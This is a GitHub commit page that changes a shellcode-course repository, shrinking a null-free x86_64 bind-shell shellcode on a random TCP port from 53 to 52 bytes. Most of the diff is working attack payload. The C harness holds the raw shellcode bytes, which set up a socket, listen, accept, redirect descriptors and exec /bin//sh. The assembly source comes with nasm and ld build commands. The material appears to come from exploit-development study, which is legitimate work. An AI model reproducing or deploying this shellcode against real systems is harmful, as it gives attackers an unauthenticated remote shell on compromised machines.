Skip to content

Commit

Permalink
oh my god, smaller?
Browse files Browse the repository at this point in the history
Let's use smarter xchg and trust in the push pop.

Signed-off-by: Geyslan G. Bem <[email protected]>
  • Loading branch information
geyslan committed Jan 29, 2021
1 parent 0493db8 commit e12bbf4
Show file tree
Hide file tree
Showing 2 changed files with 12 additions and 15 deletions.
14 changes: 7 additions & 7 deletions improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c
Original file line number Diff line number Diff line change
Expand Up @@ -28,7 +28,7 @@
assembly source:
https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
* 53 bytes
* 52 bytes
* null-free
Expand All @@ -53,12 +53,12 @@ int main(void)
{
const char code[] =

"\x6a\x29\x58\x99\x52\x5e\xff\xc6\x6a\x02"
"\x5f\x0f\x05\x52\x5e\x97\xb0\x32\x0f\x05"
"\xb0\x2b\x0f\x05\x57\x5e\x97\xff\xce\xb0"
"\x21\x0f\x05\x75\xf8\x52\x48\xbf\x2f\x2f"
"\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\xb0"
"\x3b\x0f\x05";
"\x6a\x29\x58\x99\x6a\x01\x5e\x6a\x02\x5f"
"\x0f\x05\x52\x5e\x97\xb0\x32\x0f\x05\xb0"
"\x2b\x0f\x05\x97\x96\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62"
"\x69\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b"
"\x0f\x05";

// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %ld\n", strlen(code));
Expand Down
13 changes: 5 additions & 8 deletions improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
Original file line number Diff line number Diff line change
Expand Up @@ -37,12 +37,12 @@

; tiny_shell_bind_tcp_random_port_x86_64
;
; * 54 bytes
; * 52 bytes
; * null-free
;
;
; # nasm -f elf64 tiny_shell_bind_tcp_random_port_x86_64.asm
; # ld -m elf_x86_64 tiny_shell_bind_tcp_random_port_x86_64.o -o \
; # nasm -f elf64 tiny_shell_bind_tcp_random_port_x86_64.asm; \
; ld -m elf_x86_64 tiny_shell_bind_tcp_random_port_x86_64.o -o \
; tiny_shell_bind_tcp_random_port_x86_64
;
; Testing
Expand Down Expand Up @@ -78,9 +78,8 @@ _start:
; Zeroing rdx, search about cdq instruction for understanding
cdq ; IPPROTO_IP = 0 (int) - rdx

push rdx
push 1 ; SOCK_STREAM = 1 (int)
pop rsi
inc esi ; SOCK_STREAM = 1 (int)

push 2 ; AF_INET = 2 (int)
pop rdi
Expand Down Expand Up @@ -118,10 +117,8 @@ _start:
; int dup2(int oldfd, int newfd);
; dup2(clientfd, ...)

push rdi ; push the sockfd integer to use as the loop counter (rsi)
pop rsi
xchg edi, eax ; put the clientfd returned from accept into rdi
xchg esi, eax ; put the sockfd integer into rsi to use as the loop counter

dup_loop:
dec esi ; decrement loop counter
Expand Down

0 comments on commit e12bbf4

Please sign in to comment.